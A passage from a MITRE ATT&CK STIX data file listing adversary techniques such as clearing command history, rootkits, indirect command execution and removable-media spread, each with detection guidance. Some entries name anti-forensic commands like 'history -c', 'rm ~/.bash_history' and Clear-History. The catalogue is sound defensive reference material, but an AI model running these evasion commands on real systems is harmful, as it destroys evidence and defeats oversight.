DarkGate)\n\nThese scripts may also be compiled into self-contained executable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["TruKno", "Liran Ravich, CardinalOps", "Serhii Melnyk, Trustwave SpiderLabs", "Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International", "@_montysecurity"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_remote_support": false, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--3a32740a-11b0-4bcf-b0a9-3abd0f6d3cd5", "created": "2024-03-29T18:07:04.743Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1059/010", "external_id": "T1059.010"}, {"source_name": "AutoHotKey", "description": "AutoHotkey Foundation LLC. (n.d.). Using the Program. Retrieved March 29, 2024.", "url": "https://www.autohotkey.com/docs/v1/Program.htm"}, {"source_name": "AutoIT", "description": "AutoIT. (n.d.). Running Scripts. Retrieved March 29, 2024.", "url": "https://www.autoitscript.com/autoit3/docs/intro/running.htm"}, {"source_name": "Splunk DarkGate", "description": "Splunk Threat Research Team. (2024, January 17). Enter The Gates: An Analysis of the DarkGate AutoIt Loader. Retrieved March 29, 2024.", "url": "https://www.splunk.com/en_us/blog/security/enter-the-gates-an-analysis-of-the-darkgate-autoit-loader.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Reduce Key Space", "description": "Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)\n\nAdversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key.\n\nAdversaries may modify the key size used and other encryption parameters using specialized commands in a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) introduced to the system through [Modify System Image](https://attack.mitre.org/techniques/T1601) to change the configuration of the device. (Citation: Cisco Blog Legacy Device Attacks)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "There is no documented method for defenders to directly identify behaviors that reduce encryption key space. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601) and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). Some detection methods require vendor support to aid in investigation.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Network"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--3a40f208-a9c1-4efa-a598-4003c3681fb8", "created": "2020-10-19T19:03:48.310Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1600/001", "external_id": "T1600.001"}, {"source_name": "Cisco Synful Knock Evolution", "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.", "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices"}, {"source_name": "Cisco Blog Legacy Device Attacks", "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-02-14T20:07:44.756Z", "name": "Clear Command History", "description": "In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.\n\nOn Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions.\n\nAdversaries may delete their commands from these logs by manually clearing the history (history -c) or deleting the bash history file rm ~/.bash_history. \n\nAdversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to clear command history data (clear logging and/or clear history).(Citation: US-CERT-TA18-106A)\n\nOn Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the PSReadLine module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.\n\nThe PSReadLine command history tracks the commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)\n\nAdversaries may run the PowerShell command Clear-History to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the ConsoleHost_history.txt file. Adversaries may also delete the ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Vikas Singh, Sophos", "Emile Kenning, Sophos", "Austin Clark, @c2defense"], "x_mitre_deprecated": false, "x_mitre_detection": "User authentication, especially via remote terminal services like SSH, without new entries in that user's ~/.bash_history is suspicious. Additionally, the removal/clearing of the ~/.bash_history file can be an indicator of suspicious activity.\n\nMonitor for suspicious modifications or deletion of ConsoleHost_history.txt and use of the Clear-History command.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network"], "x_mitre_version": "1.5", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Host forensic analysis", "Log analysis"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a", "created": "2020-01-31T12:32:08.228Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1070/003", "external_id": "T1070.003"}, {"source_name": "Sophos PowerShell command audit", "description": "jak. (2020, June 27). Live Discover - PowerShell command audit. Retrieved August 21, 2020.", "url": "https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit"}, {"source_name": "Microsoft PowerShell Command History", "description": "Microsoft. (2020, May 13). About History. Retrieved September 4, 2020.", "url": "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7"}, {"source_name": "US-CERT-TA18-106A", "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A"}, {"source_name": "Sophos PowerShell Command History Forensics", "description": "Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved September 4, 2020.", "url": "https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-24T14:00:00.188Z", "name": "Indirect Command Execution", "description": "Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)\n\nAdversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Matthew Demaske, Adaptforward"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor and analyze logs from host-based detection mechanisms, such as Sysmon, for events such as process creations that include or are resulting from parameters associated with invoking programs/commands/files and/or spawning child processes/network connections. (Citation: RSA Forfiles Aug 2017)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Static File Analysis", "Application Control"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e", "created": "2018-04-18T17:59:24.739Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1202", "external_id": "T1202"}, {"source_name": "Evi1cg Forfiles Nov 2017", "description": "Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved January 22, 2018.", "url": "https://twitter.com/Evi1cg/status/935027922397573120"}, {"source_name": "RSA Forfiles Aug 2017", "description": "Partington, E. (2017, August 14). Are you looking out for forfiles.exe (if you are watching for cmd.exe). Retrieved January 22, 2018.", "url": "https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe"}, {"source_name": "VectorSec ForFiles Aug 2017", "description": "vector_sec. (2017, August 11). Defenders watching launches of cmd? What about forfiles?. Retrieved January 22, 2018.", "url": "https://twitter.com/vector_sec/status/896049052642533376"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Custom Cryptographic Protocol", "description": "Adversaries may use a custom cryptographic protocol or algorithm to hide command and control traffic. A simple scheme, such as XOR-ing the plaintext with a fixed key, will produce a very weak ciphertext.\n\nCustom encryption schemes may vary in sophistication. Analysis and reverse engineering of malware samples may be enough to discover the algorithm and encryption key used.\n\nSome adversaries may also attempt to implement their own version of a well-known cryptographic algorithm instead of using a known implementation library, which may lead to unintentional errors. (Citation: F-Secure Cosmicduke)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "If malware uses custom encryption with symmetric keys, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures. (Citation: Fidelis DarkComet)\n\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect when communications do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", "created": "2017-05-31T21:30:31.197Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1024", "external_id": "T1024"}, {"source_name": "F-Secure Cosmicduke", "description": "F-Secure Labs. (2014, July). COSMICDUKE Cosmu with a twist of MiniDuke. Retrieved July 3, 2014.", "url": "https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf"}, {"source_name": "Fidelis DarkComet", "description": "Fidelis Cybersecurity. (2015, August 4). Looking at the Sky for a DarkComet. Retrieved April 5, 2016.", "url": "https://www.fidelissecurity.com/sites/default/files/FTA_1018_looking_at_the_sky_for_a_dark_comet.pdf"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Revert Cloud Instance", "description": "An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.\n\nAnother variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Netskope"], "x_mitre_detection": "Establish centralized logging of instance activity, which can be used to monitor and review system events even after reverting to a snapshot, rolling back changes, or changing persistence/type of storage. Monitor specifically for events related to snapshots and rollbacks and VM configuration changes, that are occurring outside of normal activity. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["IaaS"], "x_mitre_version": "1.2", "x_mitre_permissions_required": ["User", "Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--3b4121aa-fc8b-40c8-ac4f-afcb5838b72c", "created": "2019-09-04T14:37:07.959Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1536", "external_id": "T1536"}, {"source_name": "Tech Republic - Restore AWS Snapshots", "description": "Hardiman, N.. (2012, March 20). Backing up and restoring snapshots on Amazon EC2 machines. Retrieved October 8, 2019.", "url": "https://www.techrepublic.com/blog/the-enterprise-cloud/backing-up-and-restoring-snapshots-on-amazon-ec2-machines/"}, {"source_name": "Google - Restore Cloud Snapshot", "description": "Google. (2019, October 7). Restoring and deleting persistent disk snapshots. Retrieved October 8, 2019.", "url": "https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2023-10-13T17:57:03.989Z", "name": "Rootkit", "description": "Adversaries may deploy rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting and modifying operating-system API calls that supply system information. Rootkits or rootkit-enabling functionality may reside at the user or kernel level in the operating system, or lower. (Citation: Enterprise ATT&CK January 2018) \n\nFirmware rootkits that affect the operating system yield nearly full control of the system. While firmware rootkits are normally developed for the main processing board, they can also be developed for the I/O that is attached to an asset. Compromise of this firmware allows the modification of all of the process variables and functions the module engages in. This may result in commands being disregarded and false information being fed to the main device. By tampering with device processes, an adversary may inhibit its expected response functions and possibly enable [Impact](https://attack.mitre.org/tactics/TA0105).", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "evasion"}, {"kill_chain_name": "mitre-ics-attack", "phase_name": "inhibit-response-function"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.1", "x_mitre_data_sources": ["Firmware: Firmware Modification"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0851", "external_id": "T0851"}, {"source_name": "Enterprise ATT&CK January 2018", "description": "Enterprise ATT&CK 2018, January 11 Rootkit Retrieved. 2018/05/16 ", "url": "https://attack.mitre.org/wiki/Technique/T1014"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-17T20:42:21.453Z", "name": "Replication Through Removable Media", "description": "Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.\n\nMobile devices may also be used to infect PCs with malware if connected via USB.(Citation: Exploiting Smartphone USB ) This infection may be achieved using devices (Android, iOS, etc.) and, in some instances, USB charging cables.(Citation: Windows Malware Infecting Android)(Citation: iPhone Charging Cable Hack) For example, when a smartphone is connected to a system, it may appear to be mounted similar to a USB-connected disk drive. If malware that is compatible with the connected system is on the mobile device, the malware could infect the machine (especially if Autorun features are enabled).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "lateral-movement"}, {"kill_chain_name": "mitre-attack", "phase_name": "initial-access"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Joas Antonio dos Santos, @C0d3Cr4zy"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor file access on removable media. Detect processes that execute from removable media after it is mounted or when initiated by a user. If a remote access tool is used in this manner to move laterally, then additional actions are likely to occur after execution, such as opening network connections for Command and Control and system and network information Discovery.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_system_requirements": ["Removable media allowed, Autorun enabled or vulnerability present that allows for code execution"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4", "created": "2017-05-31T21:31:08.977Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1091", "external_id": "T1091"}, {"source_name": "Windows Malware Infecting Android", "description": "Lucian Constantin. (2014, January 23). Windows malware tries to infect Android devices connected to PCs. Retrieved May 25, 2022.", "url": "https://www.computerworld.com/article/2486903/windows-malware-tries-to-infect-android-devices-connected-to-pcs.html"}, {"source_name": "iPhone Charging Cable Hack", "description": "Zack Whittaker. (2019, August 12). This hacker\u2019s iPhone charging cable can hijack your computer. Retrieved May 25, 2022.", "url": "https://techcrunch.com/2019/08/12/iphone-charging-cable-hack-computer-def-con/"}, {"source_name": "Exploiting Smartphone USB ", "description": "Zhaohui Wang & Angelos Stavrou. (n.d.). Exploiting Smart-Phone USB Connectivity For Fun And Profit. Retrieved May 25, 2022.", "url": "https://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.226.3427&rep=rep1&type=pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Data from Local System", "description": "Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.\n\nAdversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.\n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["William Cain", "Austin Clark, @c2defense"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor processes and command-line arguments for actions that could be taken to collect files from a system. Remote access tools with built-in features may interact directly with the Windows API to gather data. Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to collect files such as configuration files with built-in features native to the network device platform.(Citation: Mandiant APT41 Global Intrusion )(Citation: US-CERT-TA18-106A) Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nFor network infrastructure devices, collect AAA logging to monitor `show` commands that view configuration files. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network"], "x_mitre_version": "1.6", "x_mitre_data_sources": [], "x_mitre_system_requirements": ["Privileges to access certain files and directories"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "created": "2017-05-31T21:30:20.537Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1005", "external_id": "T1005"}, {"source_name": "show_run_config_cmd_cisco", "description": "Cisco. (2022, August 16). show running-config - Cisco IOS Configuration Fundamentals Command Reference . Retrieved July 13, 2022.", "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/show_protocols_through_showmon.html#wp2760878733"}, {"source_name": "Mandiant APT41 Global Intrusion ", "description": "Gyler, C.,Perez D.,Jones, S.,Miller, S.. (2021, February 25). This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved February 17, 2022.", "url": "https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits"}, {"source_name": "US-CERT-TA18-106A", "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-08-14T19:28:18.334Z", "name": "Deobfuscate/Decode Files or Information", "description": "Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.\n\nOne such example is the use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file.(Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows copy /b command to reassemble binary fragments into a malicious payload.(Citation: Carbon Black Obfuscation Sept 2016)\n\nSometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Matthew Demaske, Adaptforward", "Red Canary"], "x_mitre_deprecated": false, "x_mitre_detection": "Detecting the action of deobfuscating or decoding files or information may be difficult depending on the implementation. If the functionality is contained within malware and uses the Windows API, then attempting to detect malicious behavior before or after the action may yield better results than attempting to perform analysis on loaded libraries or API calls. If scripts are used, then collecting the scripts for analysis may be necessary. Perform process and command-line monitoring to detect potentially malicious behavior related to scripts and system utilities such as [certutil](https://attack.mitre.org/software/S0160).\n\nMonitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Linux", "macOS"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Anti-virus", "Host Intrusion Prevention Systems", "Signature-based Detection", "Network Intrusion Detection System"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", "created": "2017-12-14T16:46:06.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1140", "external_id": "T1140"}, {"source_name": "Volexity PowerDuke November 2016", "description": "Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017.", "url": "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/"}, {"source_name": "Malwarebytes Targeted Attack against Saudi Arabia", "description": "Malwarebytes Labs. (2017, March 27). New targeted attack against Saudi Arabia Government. Retrieved July 3, 2017.", "url": "https://blog.malwarebytes.com/cybercrime/social-engineering-cybercrime/2017/03/new-targeted-attack-saudi-arabia-government/"}, {"source_name": "Carbon Black Obfuscation Sept 2016", "description": "Tedesco, B. (2016, September 23). Security Alert Summary. Retrieved February 12, 2018.", "url": "https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Outlook Rules", "description": "Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)\n\nOnce malicious rules have been added to the user\u2019s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Microsoft Security"], "x_mitre_detection": "Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Office 365"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator", "User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44", "created": "2019-11-07T20:00:25.560Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1137/005", "external_id": "T1137.005"}, {"source_name": "SilentBreak Outlook Rules", "description": "Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved February 4, 2019.", "url": "https://silentbreaksecurity.com/malicious-outlook-rules/"}, {"source_name": "Microsoft Detect Outlook Forms", "description": "Fox, C., Vangel, D. 